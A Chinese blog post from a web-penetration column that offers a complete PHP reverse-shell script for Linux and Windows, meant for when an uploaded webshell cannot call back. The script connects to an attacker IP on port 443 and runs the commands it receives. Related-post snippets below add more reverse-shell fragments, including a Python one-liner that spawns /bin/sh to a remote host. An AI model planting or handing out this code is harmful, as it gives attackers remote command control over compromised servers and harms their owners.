PHP反弹Cmd/Shell 脚本

最新推荐文章于 2023-10-08 02:24:31 发布
最新推荐文章于 2023-10-08 02:24:31 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: web渗透 文章标签: PHP反弹CmdShell 脚本
本文提供了一种在Linux和Windows平台上实现Shell反弹的方法,通过PHP脚本与远程服务器建立连接,接收并执行命令,适用于当常规反弹手段受限的情况。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

遇到大马无法反弹时可以试试,linux,windows均可反弹

<?php 

error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set('max_execution_time',0);
$os = substr(PHP_OS,0,3);
$ipaddr = 'xxx.xxx.xxx.xxx';
$port = '443';
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\n------------Code by Spider-------------\n";
if($os == 'WIN') {
    $env = array('path' => 'c:\\windows\\system32');
} else {
    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}


if(function_exists('fsockopen')) {
    $sock = fsockopen($ipaddr,$port);
    fwrite($sock,$msg);
    while ($cmd = fread($sock,1024)) {
        if (substr($cmd,0,3) == 'cd ') {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        }
        if (trim(strtolower($cmd)) == 'exit') {
            break;
        } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                fwrite($sock,$msg);
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                fwrite($sock,$msg);
                fclose($pipes[2]);
                proc_close($process);
            }
        }
    }
    fclose($sock);
} else {
    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    socket_connect($sock,$ipaddr,$port);
    socket_write($sock,$msg);
    fwrite($sock,$msg);
    while ($cmd = socket_read($sock,1024)) {
        if (substr($cmd,0,3) == 'cd ') {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        }
        if (trim(strtolower($cmd)) == 'exit') {
            break;
        } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[2]);
                proc_close($process);
            }
        }
    }
    socket_close($sock);
}
?>
反弹Shell测试脚本
SHELLCODE_8BIT的博客
06-20 565
使用下列脚本可以测试反弹Shell
反弹shell 看这一篇就够了
m0_69043895的博客
04-21 2327
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
PHP脚本反弹SHELL
10-20
脚本可以反弹SHELL到指定地址,得到交互交shell
PHP代码实现反弹shell
E1even的博客
08-28 4061
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
php反弹,php反弹shell实现代码
weixin_39532754的博客
03-10 543
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpsp...
PHP反弹脚本 Linux/Windows两用
chuancuili8770的博客
07-11 252
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; ...
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 4168
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
反弹shell脚本
Soul Blog
11-23 3331
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 912
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
Php shell端口反弹,Linux下通过webshell反弹shell总结
weixin_33253503的博客
03-12 534
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...
php-reverse-shell
07-24
php-reverse-shell
反弹cmd命令
12-06
反弹cmd命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
PHP反弹shell
痴人说梦梦中人
09-26 7797
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
php反弹shell代码,反弹shell.php
weixin_31491381的博客
03-29 715
function which($pr){$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);}elseif...
PHP Webshell 下的反弹 Shell
XtAbap的博客
10-08 663
Webshell 是一种常见的恶意软件,它允许攻击者通过一个受感染的网站来执行远程命令和控制目标服务器。其中一种常见的攻击技术是通过 Webshell 反弹一个 Shell 连接,以便攻击者能够直接与目标服务器进行交互并执行命令。通过编写一个 PHP 脚本,我们可以在目标服务器上建立一个反向连接,并与攻击者的机器进行交互。然而,使用 Webshell 进行非法活动是违法的,且严重违反道德和法律规定。要实现反弹 Shell,我们需要编写一个 PHP 脚本,该脚本将作为 Webshell 在目标服务器上执行。
php reverseShell
Cosmopolitan的博客
06-12 686
<?php $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_c...
用metasploit生产反弹shell
最新发布
03-15
### 使用 Metasploit 框架生成反弹 Shell 的配置说明 #### 配置目标 为了实现从目标主机到攻击者机器的反弹 Shell 连接,可以使用 Metasploit 提供的强大功能。以下是基于 Metasploit 框架生成反弹 Shell 的具体...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值